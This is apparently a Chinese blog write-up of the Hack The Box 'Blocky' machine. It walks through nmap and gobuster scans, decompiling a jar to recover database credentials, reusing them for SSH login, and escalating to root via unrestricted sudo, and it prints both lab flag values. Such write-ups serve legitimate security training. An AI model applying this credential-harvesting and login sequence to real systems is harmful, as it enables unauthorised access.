Blocky-htb-writeup

0x00 靶场技能介绍

章节技能:目录扫描、jar文件反编译读源码、sudo -i 切换root用户

参考链接:官方引导

0x01 用户权限获取

1、这是一个简单的靶机,却也是我觉得最符合oscp的靶机,有兔子洞,但是又存在多种可能

2、常规获取下靶机IP地址:10.10.10.37

3、扫描下开放端口信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌─[us-vip-22]─[10.10.14.4]─[htb-shiyan@htb-tlqbfgzof4]─[~/Desktop]
└──╼ [★]$ sudo nmap -sC -sV -T4 -Pn 10.10.10.37
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-12 06:25 GMT
Nmap scan report for 10.10.10.37
Host is up (0.043s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d62b99b4d5e753ce2bfcb5d79d79fba2 (RSA)
|   256 5d7f389570c9beac67a01e86e7978403 (ECDSA)
|_  256 09d5c204951a90ef87562597df837067 (ED25519)
80/tcp   open   http    Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://blocky.htb
|_http-server-header: Apache/2.4.18 (Ubuntu)
8192/tcp closed sophos
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

4、这里发现个域名,本地加入下hosts

1
2
3
┌─[us-vip-22]─[10.10.14.4]─[htb-shiyan@htb-tlqbfgzof4]─[~/Desktop]
└──╼ [★]$ echo "10.10.10.37 blocky.htb" | sudo tee -a /etc/hosts
10.10.10.37 blocky.htb

5、由于存在21端口,我这里尝试了ftp匿名登录,但是无果,我又ftp软件版本漏洞测试无果、ssh版本漏洞无果、Apache版本漏洞无果。

6、这里80端口首页是wordpress,我尝试了wpscan扫描,又尝试了wp版本漏洞等均无果、后台弱口令无果。。。

7、至此,我陷入了迷茫,感觉做的靶机越多,越觉得哪里都是漏洞,只要出现版本号。

8、由于觉得这个是wp框架,我就懒了目录扫描了,这里继续目录扫描下,结果发现了奇点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌─[us-vip-22]─[10.10.14.4]─[htb-shiyan@htb-tlqbfgzof4]─[~/Desktop]
└──╼ [★]$ gobuster dir -u http://blocky.htb --wordlist=/usr/share/dirbuster/wordlists/directory-list-1.0.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blocky.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/12/12 07:54:26 Starting gobuster in directory enumeration mode
===============================================================
/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]

9、这里发现了2个压缩包文件,下载下来,使用jd-gui进行反编译下看看内容

10、在这里发现了数据库的账号密码,这里我想起了以前的htb的靶场套路,使用root直接ssh登录,登录失败,但是在网站首页有个用户名信息的

11、到这里使用该账号名,成功登录系统,并获取到第一个flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(kali㉿kali)-[~/桌面]
└─$ ssh notch@10.10.10.37
notch@10.10.10.37's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Fri Jul  8 07:16:08 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

notch@Blocky:~$ pwd
/home/notch
notch@Blocky:~$ ls -la
total 40
drwxr-xr-x 5 notch notch 4096 Jul  8  2022 .
drwxr-xr-x 3 root  root  4096 Jul  2  2017 ..
-rw------- 1 notch notch    1 Dec 24  2017 .bash_history
-rw-r--r-- 1 notch notch  220 Jul  2  2017 .bash_logout
-rw-r--r-- 1 notch notch 3771 Jul  2  2017 .bashrc
drwx------ 2 notch notch 4096 Jul  2  2017 .cache
drwxrwxr-x 7 notch notch 4096 Jul  2  2017 minecraft
drwxrwxr-x 2 notch notch 4096 Jul  2  2017 .nano
-rw-r--r-- 1 notch notch  655 Jul  2  2017 .profile
-r-------- 1 notch notch   33 Dec 12 00:23 user.txt
notch@Blocky:~$ cat user.txt
5ca90bc0edb9f99b3b0a33f9ddc79f88
notch@Blocky:~$

0x02 系统权限获取

12、这里通过 sudo -l ,发现可以直接切换到root用户。

1
2
3
4
5
6
7
8
9
10
11
12
13
notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL
notch@Blocky:~$ sudo -i
root@Blocky:~# 
root@Blocky:~# cat /root/root.txt
601338ca4a3ab4f549f0723ea3ae4cca
root@Blocky:~#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/48

http:\sh1yan.top\photo\

打靶记
#shooting-range
Blocky-htb-writeup
https://sh1yan.top/2023/12/12/Blocky-htb-writeup/
作者
shiyan
发布于
2023年12月12日
许可协议